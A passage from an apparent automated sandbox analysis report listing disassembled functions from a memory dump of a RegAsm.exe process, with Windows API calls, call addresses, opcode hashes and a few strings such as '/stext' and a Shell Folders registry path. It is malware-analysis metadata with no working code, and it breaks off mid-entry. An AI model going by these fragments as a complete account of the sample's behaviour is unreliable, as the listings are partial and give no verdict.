                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                            • CloseHandle.KERNEL32(00000000), ref: 0040A061
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: File$CloseCreateHandleTime
                            • String ID:
                            • API String ID: 3397143404-0
                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                            APIs
                            • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                            • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Temp$DirectoryFileNamePathWindows
                            • String ID:
                            • API String ID: 1125800050-0
                            • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                            • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                            • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                            • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: CloseHandleSleep
                            • String ID: }A
                            • API String ID: 252777609-2138825249
                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset
                            • String ID: BINARY
                            • API String ID: 2221118986-907554435
                            • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                            • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                            • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                            • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                            APIs
                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                            • _mbscpy.MSVCRT ref: 00405250
                            • _mbscat.MSVCRT ref: 0040525B
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                            • String ID:
                            • API String ID: 568699880-0
                            • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                            • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                            • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                            • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _wcsicmp
                            • String ID: /stext
                            • API String ID: 2081463915-3817206916
                            • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                            • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                            • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                            • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                            APIs
                              • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                            • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                            • CloseHandle.KERNEL32(00000000), ref: 0040957A
                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                              • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: File$??2@CloseCreateHandleReadSize
                            • String ID:
                            • API String ID: 1023896661-0
                            • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                            • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                            • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                            • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                            APIs
                              • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                            • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                              • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                            • CloseHandle.KERNEL32(?), ref: 0040CC98
                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                            • String ID:
                            • API String ID: 2445788494-0
                            • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                            • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                            • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                            • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcmpmemset
                            • String ID:
                            • API String ID: 1065087418-0
                            • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                            • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                            • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                            • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                            APIs
                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                            • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                            • CloseHandle.KERNEL32(?), ref: 00410654
                              • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                              • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                              • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                              • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                            • String ID:
                            • API String ID: 1381354015-0
                            • Opcode ID: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                            • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                            • Opcode Fuzzy Hash: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                            • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                            • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                            • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                            • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                            APIs
                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                              • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                              • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: File$Time$CloseCompareCreateHandlememset
                            • String ID:
                            • API String ID: 2154303073-0
                            • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                            • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                            • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                            • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                            APIs
                            • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                              • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: File$PointerRead
                            • String ID:
                            • API String ID: 3154509469-0
                            • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                            • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                            • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                            • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                            APIs
                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: PrivateProfile$StringWrite_itowmemset
                            • String ID:
                            • API String ID: 4232544981-0
                            • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                            • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                            • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                            • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                            APIs
                            • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FreeLibrary
                            • String ID:
                            • API String ID: 3664257935-0
                            • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                            • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                            • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                            • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                            APIs
                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FileModuleName
                            • String ID:
                            • API String ID: 514040917-0
                            • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                            • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                            • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                            • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                            APIs
                            • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                            • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                            • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                            • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                            APIs
                            • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FileWrite
                            • String ID:
                            • API String ID: 3934441357-0
                            • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                            • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                            • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                            • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                            APIs
                            • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FreeLibrary
                            • String ID:
                            • API String ID: 3664257935-0
                            • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                            • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                            • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                            • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@
                            • String ID:
                            • API String ID: 613200358-0
                            • Opcode ID: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                            • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                            • Opcode Fuzzy Hash: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                            • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                            • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                            • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                            • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                            APIs
                            • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                            • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                            • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                            • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@
                            • String ID:
                            • API String ID: 613200358-0
                            • Opcode ID: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                            • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                            • Opcode Fuzzy Hash: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                            • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@
                            • String ID:
                            • API String ID: 613200358-0
                            • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                            • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                            • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                            • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                            APIs
                            • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FreeLibrary
                            • String ID:
                            • API String ID: 3664257935-0
                            • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                            • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                            • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                            • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                            APIs
                            • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: EnumNamesResource
                            • String ID:
                            • API String ID: 3334572018-0
                            • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                            • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                            • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                            • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FreeLibrary
                            • String ID:
                            • API String ID: 3664257935-0
                            • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                            • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                            • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                            • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                            APIs
                            • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: CloseFind
                            • String ID:
                            • API String ID: 1863332320-0
                            • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                            • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                            • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                            • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                            APIs
                            • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Open
                            • String ID:
